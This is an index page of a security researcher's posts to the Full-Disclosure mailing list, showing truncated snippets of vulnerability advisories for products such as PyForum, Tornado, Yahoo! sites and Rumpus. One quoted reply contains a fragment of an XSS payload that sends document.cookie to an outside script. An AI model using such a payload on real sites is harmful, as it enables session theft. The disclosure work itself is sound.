[Full-disclosure] Indexed blind SQL injection

2011-12-03 Thread Nam Nguyen
as table scan, applicable value domain, network latency, and amount of sleep time are at the top list to watch out for. Acknowledgement +++ Thanks go to Nam Nguyen for his early review and support. -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn

[Full-disclosure] [BMSA-2011-02] Cross site scripting in Yahoo! Pulse

2011-05-17 Thread Nam Nguyen
icular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluem

[Full-disclosure] [BMSA-2011-01] Insecure secure cookie in web.go

2011-02-25 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2011-01 === :Title: Insecure secure cookie in web.go :Severity: Low :Reporter: Blue Moon Consulting :Products: web.go :Fixed in: -- Description --- web.go is the simplest way to write web applications in the Go programming la

[Full-disclosure] Insecure secure cookie in Tornado

2010-08-15 Thread Nam Nguyen
ked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn pgpcryWcV5mvc.pgp Descr

Re: [Full-disclosure] ACROS Security: Remote Binary Planting in VMware Tools for Windows (ASPR #2010-04-12-1)

2010-04-13 Thread Nam Nguyen
On Mon, 12 Apr 2010 18:54:58 +0200 "ACROS Lists" wrote: > as public disclosure would reveal too many details on > the vulnerability And yet it's on Full Disclosure. Ironic. Cheers -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http:

[Full-disclosure] [BMSA-2009-08] Multiple Vulnerabilities in PyForum

2009-12-14 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2009-08 === :Title: Multiple Vulnerabilities in PyForum :Severity: Critical :Reporter: Hoang Quoc Thinh and Blue Moon Consulting :Products: PyForum v1.0.3 :Fixed in: -- Description --- PyForum is a 100% python-based message bo

[Full-disclosure] [BMSA-2009-07] Backdoor in PyForum

2009-11-30 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2009-07 === :Title: Backdoor in PyForum :Severity: Critical :Reporter: Blue Moon Consulting :Products: PyForum v1.0.3 :Fixed in: -- Description --- pyForum is a 100% python-based message board system based in the excellent we

[Full-disclosure] [BMSA-2009-06] Remote code execution in BKAV eOffice

2009-09-01 Thread Nam Nguyen
is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn pgp45qvk8aqtU.pgp Description: PGP signature ___

[Full-disclosure] [BMSA 2009-05] Cross Site Request Forgery in Yahoo! 360plus

2009-06-09 Thread Nam Nguyen
your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. Cheers -- Nam Nguyen Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn pgp7m7VsFpa7N.pgp Description: PGP signature ___ Full-Disclosur

Re: [Full-disclosure] Universal XSS in all Google Services

2009-05-12 Thread Nam Nguyen
cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index > > I would like thank the Google Security Team for their prompt responses and > fixing this serious issue in a timely manner. If you think Google took a long > time in

[Full-disclosure] [BMSA 2009-04] Remote DoS in Internet Explorer

2009-04-11 Thread Nam Nguyen
he advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. Cheers -- Nam Nguyen Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn ___ Full

Re: [Full-disclosure] Security contact at Yahoo!

2009-03-26 Thread Nam Nguyen
On Thu, 26 Mar 2009 12:30:16 + James Rankin wrote: > try n3td3v hah hah. very funny. cheers nam > > 2009/3/26 Nam Nguyen > > > Hi list > > > > We were alerted of a critical security issue at one of Yahoo sites. After > > some failed attempts to conta

[Full-disclosure] Security contact at Yahoo!

2009-03-26 Thread Nam Nguyen
Hi list We were alerted of a critical security issue at one of Yahoo sites. After some failed attempts to contact them (secur...@yahoo-inc.com), we thought maybe people on this list could help get them to contact us. Or is there any Yahoo employee watching this list? Cheers -- Nam Nguyen

[Full-disclosure] [BMSA-2009-03] Multiple vulnerabilities in OpenSite v2.1

2009-02-24 Thread Nam Nguyen
inked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. Cheers -- Nam Nguyen Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn pgp32XvU2HJEn.pgp Description: PGP signature ___

[Full-disclosure] [BMSA-2009-02] XML injection in PyBlosxom

2009-02-08 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2009-02 === :Title: XML Injection in PyBlosxom :Severity: Low :Reporter: Blue Moon Consulting :Products: PyBlosxom v1.4.3 :Fixed in: -- Description --- PyBlosxom is a lightweight file-based weblog system. The project started a

[Full-disclosure] [BMSA-2009-01] Authentication bypass in Interspire Shopping Cart v4.0.1 and below

2009-01-12 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2009-01 === :Title: Authentication bypass in Interspire Shopping Cart :Severity: Critical :Reporter: Truong Van Tri and Blue Moon Consulting :Products: Interspire Shopping Cart v4.0.1 Ultimate edition :Fixed in: v4.0.2 Description

[Full-disclosure] [BMSA 2008-09] Two buffer overflow vulnerabilities in Rumpus v6.0

2008-12-01 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2008-09 === :Title: Two buffer overflows in Maxum Rumpus :Severity: Critical :Reporter: Blue Moon Consulting :Products: Maxum Rumpus v6.0 :Fixed in: 6.0.1 Description --- Rumpus turns any Mac into a file transfer server. Rump

Re: [Full-disclosure] [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

2008-11-24 Thread Nam Nguyen
The report is for ffdshow, but the referred URL is to ffdshow-tryout. I wonder if they are the same. Cheers Nam On Mon, 24 Nov 2008 15:17:05 +0700 "svrt" <[EMAIL PROTECTED]> wrote: > 1. General Information > > ffdshow is a DirectShow filter and VFW codec for many audio and video > formats, su

[Full-disclosure] [BMSA 2008-07] Format string vulnerability in 5th street

2008-06-25 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2008-07 === :Title: Format string vulnerability in 5th street (Hot Step, High Street 5) :Severity: Critical :Reporter: Blue Moon Consulting, superkhung :Products: 5th street and derived clients :Fixed in: -- Description --- 5t